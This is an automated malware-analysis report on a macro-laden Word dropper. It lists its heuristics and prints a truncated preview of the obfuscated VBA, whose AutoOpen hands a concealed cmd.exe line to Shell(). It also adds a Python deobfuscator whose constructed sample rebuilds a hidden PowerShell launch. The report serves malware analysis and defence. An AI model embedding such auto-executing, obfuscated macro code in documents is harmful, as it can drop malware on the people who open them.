Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic); T1204.002 (User Execution: Malicious File)
The sample is a Microsoft Word document (the VBA project is based on Normal.ThisDocument) whose Autoopen subroutine runs as soon as the document is opened with macros enabled. Autoopen calls SGjJo, which passes a concatenated string to Shell(), i.e. it launches an external command. That string is assembled from the return values of helper functions (oFluwIi, djSzCPrSRN and others) that each glue together split string literals; the fragments visible in the extracted source (caret-broken tokens such as %^c^o^m^S^p^E^c^%, the /V and /c switches, and chains of set %name%=value&& assignments whose values are one- or two-character pieces like "p", "o^w" and "e^r" later referenced as !%name%!) are a cmd.exe command line that relies on delayed environment-variable expansion to reassemble its payload only at run time. The first character comes from Chr(dNHwbhjjfk + vbKeyC + ACwUYIQVHa); vbKeyC is 67, so if the two surrounding names are unassigned this yields "C" and the command begins "Cmd ...". The arithmetic loops between the fragments are padding whose run-time errors (for example ChrW on an out-of-range value) are swallowed by On Error Resume Next. Neither the heuristics nor the truncated preview yield the final command, but an auto-executing macro that hands an obfuscated cmd.exe line to Shell() is characteristic of a malware dropper fetching or launching a second-stage payload.
Heuristics (6)

- VBA macros detected [medium] OLE_VBA_MACROS: Document contains VBA macro code (3 related findings).
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this report did recover a VBA project (macros.bas below), so here the marker overlaps with the VBA AutoOpen findings rather than adding independent evidence.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in ordinary Office files, not a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17190 bytes | 6634a82b20da2fd01e92b35dc7ddd26ebb9cdf17a384f2c25fc6a3901d177e90 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ZPnNWRYkCCYFsi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SGjJo()
On Error Resume Next
For cRSQSc = lzsUs To 69255
ZMlkK = (IbqiM - ChrW(51369 * 72820) * hrFVE * CInt(EKtDo + Sqr(90346)) + 59295 - 10739 / 83861 - CDate(HIUqR - 14836 + 74775 - Hex(QaUBbj / 8261)) + (qBDGmw * Tan(LQOThv)))
Next
For WCjoa = GvtaE To 31849
iEDjJ = (wEcClP - ChrW(17791 * 40890) * aDoFt * CInt(DRRmI + Sqr(1716)) + 72299 - 91186 / 16531 - CDate(BWtIGM - 59052 + 18897 - Hex(wLtAwY / 33723)) + (zVqlzX * Tan(bmmzA)))
Next
SGjJo = tItTFvC + Shell(RhfITJwD + Chr(dNHwbhjjfk + vbKeyC + ACwUYIQVHa) + oFluwIi + djSzCPrSRN + TWRPNrS + dfTlLl + mTsAjojmv + jjcXYKMwbiq + nYLsKwr, tPljPOCoTI + 0 + QFwhXSa)
For LIUZjt = MCOYi To 45063
pKRSNr = (oaSrC - ChrW(98141 * 80184) * TahJjn * CInt(ZaPfC + Sqr(41484)) + 91090 - 13478 / 33891 - CDate(bcOQV - 36856 + 67612 - Hex(jXiBi / 62437)) + (ZfinqV * Tan(HmlqDi)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For zsTAja = aQwHw To 149
QUXsi = (cqMTam - ChrW(75984 * 41432) * fiPATi * CInt(OAwFXz + Sqr(27704)) + 69428 - 62680 / 85678 - CDate(lrRNw - 39510 + 94694 - Hex(GfAaz / 75713)) + (zkTrz * Tan(UlFWtd)))
Next
SGjJo
For dccmi = CiLRj To 90603
GcwOa = (SXBdQ - ChrW(79073 * 89991) * QFLrEr * CInt(jiCNsj + Sqr(71259)) + 42825 - 73447 / 37157 - CDate(wuZsmq - 91178 + 85964 - Hex(qbwMz / 75636)) + (lYAZbD * Tan(WzvBi)))
Next
End Sub
Attribute VB_Name = "hAPKcsAPYS"
Function oFluwIi()
On Error Resume Next
For lzziq = pNDwj To 26673
tbBFR = (uFjZNP - ChrW(86683 * 69357) * AQuGwm * CInt(WSoOw + Sqr(2794)) + 23132 - 52786 / 66636 - CDate(EmJzj - 67657 + 17110 - Hex(RGBXlS / 94487)) + (ENnBdO * Tan(aFjQC)))
Next
HQqjVj = "md c" + "bsdNdGmKp" + "Liu S" + "ir" + "wuqLo"
For stHqz = GanRh To 72554
hjRwhW = (Kwwoj - ChrW(69940 * 79928) * jsASG * CInt(YMujlG + Sqr(81362)) + 25478 - 33805 / 92227 - CDate(PAhjJ - 12239 + 3600 - Hex(kpwuTJ / 29105)) + (hquQP * Tan(AJTXSv)))
Next
LwcAaYXJDcm = "wfjmEWPbO" + " SLQdO" + "XdCizdt" + " & "
For bzfCi = jIsZm To 96654
WncRa = (WlIWW - ChrW(59538 * 81863) * AXMmoG * CInt(JrRrks + Sqr(60704)) + 25870 - 80415 / 32815 - CDate(SrINh - 4409 + 92837 - Hex(YiTbIY / 84893)) + (ikfnzr * Tan(NvKZqd)))
Next
ovBtiz = " %^c^o^m^S^" + "p^E^c^% " + " %^c^o^m" + "^S^" + "p^E" + "^c^% " + " /V " + " /c" + " " + " s"
For XSFOMw = nqKqsi To 2603
QJTsMw = (KdKbzv - ChrW(34211 * 43187) * GRhGAW * CInt(LtEvtU + Sqr(95225)) + 9302 - 18398 / 81846 - CDate(iBFzQ - 89595 + 89603 - Hex(bDlzf / 41938)) + (hjbAu * Tan(uPIzIB)))
Next
izLhEspYv = "et %zYvBCmpnzc" + "ndhwj%=BPvN" + "zCbDBAcYR&&" + "set" + " %kivkdwpoCT%=" + "p&&set %"
For qfFRJZ = UXIAmM To 85606
qatYZZ = (NdIvhk - ChrW(74440 * 95171) * ItLRvz * CInt(qGizK + Sqr(52330)) + 51193 - 27110 / 66578 - CDate(zYhFkb - 18199 + 7108 - Hex(cINrC / 65375)) + (KstAa * Tan(tHDRqa)))
Next
qdlUal = "YhLYkYDDE%=o^w" + "&&" + "set %" + "odpUQfHrDU" + "cmahq%=nvQq" + "mBTDPw&&set" + " %" + "ULfjNSjpVatH"
For mCuNkk = PsXRC To 26989
UKcPjR = (QhUiWB - ChrW(60426 * 50892) * Tkjcf * CInt(OAHRT + Sqr(18351)) + 33910 - 40667 / 53381 - CDate(MVYwbC - 20438 + 16737 - Hex(VUZfNj / 66923)) + (rEjSlz * Tan(wcHOzb)))
Next
AOSHBoTmc = "q%=!%kivk" + "dw" + "poCT%!&&set %" + "zzrzB" + "KQVKzwIQSY%=z" + "uTbWUlfOELifn&"
oFluwIi = HQqjVj + LwcAaYXJDcm + ovBtiz + izLhEspYv + qdlUal + AOSHBoTmc
End Function
Function djSzCPrSRN()
On Error Resume Next
For MsjJfH = aRaamK To 9204
UtikUa = (vfaXc - ChrW(98787 * 96538) * wKOWIj * CInt(EDbLQn + Sqr(12335)) + 84919 - 99625 / 75754 - CDate(IIOfMH - 47620 + 92302 - Hex(DiIiic / 43977)) + (PXnwHY * Tan(iJIJdo)))
Next
AwSQZEMuPzd = "&set %cd" + "LizPdMnjlpjj" + "%=e^r&&" + "set %Yfp" + "DCIFB" + "C%=!%YhLYkYD" + "DE%!&&
... (truncated)
```
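The obfuscation seen in the preview (split literals glued with +, caret-broken cmd tokens, chains of set %name%=value&& whose pieces are reassembled through !%name%! delayed expansion, junk arithmetic under On Error Resume Next) can be undone mechanically. The Python below is an added example written for this report; it is not the analyzer's code and not the sample's. It evaluates only the string-building subset of VBA, assuming, as VBA does, that unassigned names are Empty (so Chr(dNHwbhjjfk + vbKeyC + ACwUYIQVHa) becomes Chr(67) = "C"), records the Shell() argument instead of running it, and then replays the cmd.exe chain with carets stripped, set results kept and !name! expanded at execution time. SAMPLE_VBA is a constructed macro in the same style, not the sample's real command, which the truncated preview does not reveal; the emulator deliberately ignores quoting, expansion of real environment variables such as %comSpec%, and the nested cmd.exe layers a real sample may go through.

```python
"""Recover the Shell() argument of a concatenation-obfuscated VBA dropper and emulate the
cmd.exe delayed-expansion chain it hands over.  Added example for this report (not code from
the analyzer or the sample).  SAMPLE_VBA is CONSTRUCTED in the style of the extracted macro."""
import re

SAMPLE_VBA = '''
Function SGjJo()
On Error Resume Next
ZMlkK = (IbqiM - ChrW(51369 * 72820) * hrFVE + 59295)
SGjJo = tItTFvC + Shell(RhfITJwD + Chr(dNHwbhjjfk + vbKeyC + ACwUYIQVHa) + oFluwIi + djSzCPrSRN, tPljPOCoTI + 0 + QFwhXSa)
End Function
Sub Autoopen()
SGjJo
End Sub
Function oFluwIi()
HQqjVj = "md /" + "V /c" + " s" + "et %^k^i^v^k%=p" + "o^w&&"
ovBtiz = "set %^z^z^r^z%=" + "ers^h&&" + "set %cd" + "Liz%=e^l^l&&"
oFluwIi = HQqjVj + ovBtiz
End Function
Function djSzCPrSRN()
qdlUal = "set %Yfp" + "DCIFBC%=!%kivk%!!%zzrz%!" + "!%cdLiz%!&&"
djSzCPrSRN = qdlUal + "!%YfpDCIFBC%! -w hid" + "den -nop"
End Function
'''

_BLOCK = re.compile(r'^(?:Function|Sub)\s+(\w+)\s*\(.*?\)\s*$\n(.*?)^End (?:Function|Sub)', re.S | re.M)
_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
_DELAYED, _SET = re.compile(r'!([^!]+)!'), re.compile(r'set\s+(.+?)=(.*)$', re.I | re.S)

def _split_top(expr, sep):
    """Split on sep at parenthesis depth 0, ignoring sep inside "..." literals."""
    parts, cur, depth, in_str = [], '', 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            depth += {'(': 1, ')': -1}.get(ch, 0)
            if ch == sep and depth == 0:
                parts.append(cur.strip())
                cur = ''
                continue
        cur += ch
    return parts + [cur.strip()]

class MacroEmulator:
    """String-building VBA subset.  Assumed: unassigned names are Empty ("" / 0; errors hidden
    by On Error Resume Next), vbKeyA..vbKeyZ = 65..90, Shell() is recorded, junk arithmetic is ""."""
    def __init__(self, src):
        self.funcs = {m.group(1): m.group(2) for m in _BLOCK.finditer(src)}
        self.shell_calls, self._stack = [], set()

    def _term(self, t, env):
        if t.startswith('"'):
            return t[1:-1]
        if m := re.fullmatch(r'Chr[W$]?\((.*)\)', t, re.S):     # integer sum, e.g. vbKeyC -> "C"
            return chr(sum(int(x) if x.isdigit() else ord(x[-1]) if re.fullmatch(r'vbKey[A-Z]', x)
                           else 0 for x in _split_top(m.group(1), '+')))
        if m := re.fullmatch(r'Shell\((.*)\)', t, re.S):        # record the command, never run it
            self.shell_calls.append(self._expr(_split_top(m.group(1), ',')[0], env))
            return ''
        if t in env:
            return env[t]
        return self.run(t) if t in self.funcs else ''

    def _expr(self, expr, env):
        return ''.join(self._term(t, env) for t in _split_top(expr, '+'))

    def run(self, name):
        """Execute a Function/Sub top to bottom; return what it assigns to its own name."""
        if name in self._stack:
            raise RecursionError('macro recursion through ' + name)
        self._stack.add(name)
        env = {}
        for line in self.funcs[name].splitlines():
            if m := _ASSIGN.match(line):
                env[m.group(1)] = self._expr(m.group(2), env)
            elif line.strip() in self.funcs:         # bare call statement such as "SGjJo"
                self.run(line.strip())
        self._stack.discard(name)
        return env.get(name, '')

def emulate_cmd(cmdline):
    """Approximate 'cmd /V /c <chain>'.  cmd.exe expands %VAR% before stripping caret escapes, so a
    caret-split token survives one shell layer and a literal '%kivk%' is simply the NAME set stores.
    Drop carets, walk the &&-chain, keep set results, expand !name! at run time (undefined -> '')."""
    text = cmdline.replace('^', '')
    m = re.search(r'\s/[cCkK]\s+', text)
    env, launched = {}, []
    for cmd in re.split(r'\s*&&?\s*', text[m.end():] if m else text):
        expanded = _DELAYED.sub(lambda k: env.get(k.group(1), ''), cmd)
        if s := _SET.match(expanded):
            env[s.group(1)] = s.group(2)
        elif expanded:
            launched.append(expanded)
    return launched

def recover_commands(vba_src, entry='Autoopen'):
    """Run the auto-exec entry point; return [(raw Shell() argument, commands it launches)]."""
    emu = MacroEmulator(vba_src)
    emu.run(entry)
    return [(raw, emulate_cmd(raw)) for raw in emu.shell_calls]
```

Call recover_commands(SAMPLE_VBA) to get the raw Shell() argument ("Cmd /V /c set %^k^i^v^k%=po^w&&...") next to the command the chain finally launches. The same parser runs over olevba output such as macros.bas above, but expect to extend _term with whatever string functions a given family uses (StrReverse, Replace, Mid) and to account for a first cmd.exe layer that only forwards the %comSpec% tokens to a second one.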